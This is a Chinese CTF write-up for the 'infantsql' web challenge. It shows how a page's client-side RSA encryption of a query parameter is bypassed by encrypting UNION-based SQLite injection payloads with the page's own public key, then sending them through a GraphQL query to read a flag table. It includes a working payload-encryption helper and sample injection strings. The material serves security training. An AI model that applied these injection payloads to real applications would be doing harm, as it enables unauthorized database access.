CTF练习-Web系列-SQLI(二)

CTF练习-Web系列-SQLI(二)

infantsql 这道题是前一道题的升级版本,区别仅在于前端调用 JSEncrypt 第三方库,用页面内嵌的公钥对 id 参数做 RSA 加密后再发送。需要注意的是,公钥本身就随页面下发给了每个客户端,任何人都能用它加密任意内容,因此这层加密只是在传输过程中隐藏了参数,对服务端的 SQL 注入没有任何防护作用。

解题过程

信息获取

首先对其搜索框进行注入点探测,可以看到id参数进行了加密

然后查看题目前端 JS 代码是如何加密 id 参数的,可以看到前端调用 JSEncrypt 第三方库,用硬编码在页面里的公钥对 id 参数进行 RSA 加密,再用 btoa 做一次 base64 编码后拼入 GraphQL 查询。

// Target's form handler, quoted verbatim from the challenge page: RSA-encrypts the
// user-supplied id with a hard-coded public key and POSTs it to the GraphQL endpoint.
// Security note: the public key is shipped to every client, so anyone can produce a
// valid ciphertext for an arbitrary payload. The encryption hides the id from a passive
// observer but is not an integrity or input-validation control — the SQL injection in
// this write-up goes straight through it.
function doSubmitForm(){
var pkey = "-----BEGIN PUBLIC KEY-----\n"+
"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIk4a0KYnqOLmJPxNGQkotihoo\n"+
"994QXmk+7M8WCS5U7kWdhfMqiyjpKzuMaRB8Aydo2bbTNjHhATTRTUIvlpqNzEob\n"+
"CSWuNFc3j3Nlk/I5ySdFo0INzlHnJtbwKQoHon0ctmyffovYNg5Ar8LPz6RbsiA7\n"+
"3Ic4McekZIkdJH08cwIDAQAB\n"+
"-----END PUBLIC KEY-----"
var ajax = new XMLHttpRequest();
ajax.open('POST',"/graphql");
ajax.setRequestHeader("content-type", "application/x-www-form-urlencoded; charset=utf-8");
var id = document.getElementById('id').value;
var encrypt = new JSEncrypt();
encrypt.setPublicKey(pkey);
// JSEncrypt's encrypt() already returns a base64 string; the page then base64-encodes
// it a second time, so any hand-crafted payload must be double-encoded the same way.
id = encrypt.encrypt(id);
id = window.btoa(id);
// The ciphertext is spliced into the query by plain string concatenation and sent in
// an x-www-form-urlencoded body without URL-encoding. The base64 alphabet has no quote
// characters, so the GraphQL string stays intact, but NOTE(review): a '+' in the
// base64 output may be decoded as a space by the server's form parser — when replaying
// by hand, URL-encode '+', '/' and '=' (e.g. '+' -> '%2B') if decryption fails.
ajax.send("query={getscorewithid(id:\""+id+"\"){ id name score }}");

// Handler is attached after send(); fine for an asynchronous request, since the
// response is delivered on a later turn of the event loop.
ajax.onreadystatechange = function () {
if (ajax.readyState==4 && ajax.status==200) {
alert(ajax.responseText);
 }
}
}

接下来的步骤和第一道题一样:枚举出存在的 getscorewithname 方法,它接收 name 参数,并返回 name、score 两个字段。

注入测试

注入时只需用上方 JS 中给出的公钥,按页面同样的流程(RSA 加密 + btoa)对 payload 进行处理,再把得到的密文放进请求包里 getscorewithname 的 name 参数即可。从后续结果看,服务端只是解密后直接拼入 SQL,并不校验密文来源,所以本地加密的任意 payload 都会被接受。注意密文中可能出现的 +、/、= 字符在 x-www-form-urlencoded 请求体中应做 URL 编码(如 + → %2B),否则服务端可能把 + 解码成空格导致解密失败。

JS 加密 payload 的代码如下(在题目页面的浏览器控制台中执行,以复用页面已加载的 JSEncrypt 库):

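/**
 * Produces the same value the challenge page sends for its id/name argument:
 * RSA-encrypt `str` with the public key lifted from the page's JS, then base64 the
 * (already base64) ciphertext a second time to mirror the page's btoa() call.
 * Run it in the challenge page's console so the page's JSEncrypt global is in scope.
 *
 * @param {string} str - plaintext payload (e.g. a SQL injection fragment).
 * @returns {string} double-base64 ciphertext ready to paste into the GraphQL query.
 * @throws {Error} if JSEncrypt cannot encrypt the payload. JSEncrypt returns `false`
 *   rather than throwing on failure (most likely: the plaintext exceeds what this key
 *   can carry under PKCS#1 v1.5 padding); without the check below that `false` would
 *   be silently base64-encoded as "ZmFsc2U=" and sent to the server.
 *
 * PKCS#1 v1.5 padding is randomized, so each call yields a different ciphertext for
 * the same payload — any of them is accepted. When pasting the result into an
 * x-www-form-urlencoded body, URL-encode '+', '/' and '=' if the server rejects it.
 */
const parse = (str) => {
  const pkey = `-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIk4a0KYnqOLmJPxNGQkotihoo
994QXmk+7M8WCS5U7kWdhfMqiyjpKzuMaRB8Aydo2bbTNjHhATTRTUIvlpqNzEob
CSWuNFc3j3Nlk/I5ySdFo0INzlHnJtbwKQoHon0ctmyffovYNg5Ar8LPz6RbsiA7
3Ic4McekZIkdJH08cwIDAQAB
-----END PUBLIC KEY-----`;
  const jsEncrypt = new JSEncrypt();
  jsEncrypt.setPublicKey(pkey);
  const data = jsEncrypt.encrypt(str);
  // JSEncrypt signals failure by returning false instead of a string; fail loudly
  // rather than shipping the literal "false" to the target.
  if (typeof data !== 'string') {
    throw new Error(`RSA encryption failed for a ${str.length}-char payload (too long for the key?)`);
  }
  return window.btoa(data);
};
parse("payload");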

查询数据库版本

// Probe the DBMS version. The leading quote presumably breaks out of the server-side
// string literal and the trailing quote re-balances the closing quote the server
// appends. Ciphertexts are randomized (PKCS#1 v1.5 padding), so your output will
// differ from the sample on the next line — any fresh output works.
parse("' UNION SELECT SQLITE_VERSION() '")
// cVlHc25oQ3Y0NGRPV1JEaG56cFBEYWJEZzZqK0VJWjBkdHlnbk9WTU5sQmU4aWVFb3JWekN5clJtb081VFVXT2VWZTBpYjJGUy8va29EZGZSOGJpc0h2UkNJdVJ3bXVKWnVBOUhRTWxKYSs4MS9LR0hiSUpxL0VFY1BqMWFOdFVXbGsrcG9OMzlOL0xrTzBtT1h4T09kanVVVVNPMkZVam9CSnFIRFJrV3VjPQ==
query={
getscorewithname(name:"cVlHc25oQ3Y0NGRPV1JEaG56cFBEYWJEZzZqK0VJWjBkdHlnbk9WTU5sQmU4aWVFb3JWekN5clJtb081VFVXT2VWZTBpYjJGUy8va29EZGZSOGJpc0h2UkNJdVJ3bXVKWnVBOUhRTWxKYSs4MS9LR0hiSUpxL0VFY1BqMWFOdFVXbGsrcG9OMzlOL0xrTzBtT1h4T09kanVVVVNPMkZVam9CSnFIRFJrV3VjPQ=="){
name
score
}

}

构造查询读取 flag 表中的 flag 字段

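// Read the flag column out of the flag table, encrypted the same way as the version
// probe above (the bare SQL fragment must go through parse() before it can be sent).
// Output is randomized (PKCS#1 v1.5 padding); the sample below is one valid value.
parse("' UNION SELECT (SELECT flag from flag)'")
//SzJYbWZzc29ackpCQWY1SFZPS2ZFZjlnbW5mRk5tV3V1dWp3bnhtcTFLTDc5TkhDenZKcXQybm90VmVKM2F1QjdISkVlS0piaDRkdXJyMXVPVmtTRUVGYjN1Q0JUUE9vblFNNlBqVk1qb0RUR1ZBbTd2OGtXbWxseXFkckR2UlhsTStLYXlTcCtJaHRKSjNrSm9jNlNXM3pJTzFBOGNMeEY2ckZsUDYyKzVFPQ==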
query={
getscorewithname(name:"SzJYbWZzc29ackpCQWY1SFZPS2ZFZjlnbW5mRk5tV3V1dWp3bnhtcTFLTDc5TkhDenZKcXQybm90VmVKM2F1QjdISkVlS0piaDRkdXJyMXVPVmtTRUVGYjN1Q0JUUE9vblFNNlBqVk1qb0RUR1ZBbTd2OGtXbWxseXFkckR2UlhsTStLYXlTcCtJaHRKSjNrSm9jNlNXM3pJTzFBOGNMeEY2ckZsUDYyKzVFPQ=="){
name
score
}
}

得到flag为:flag{Rea1_flag_1s_Me}
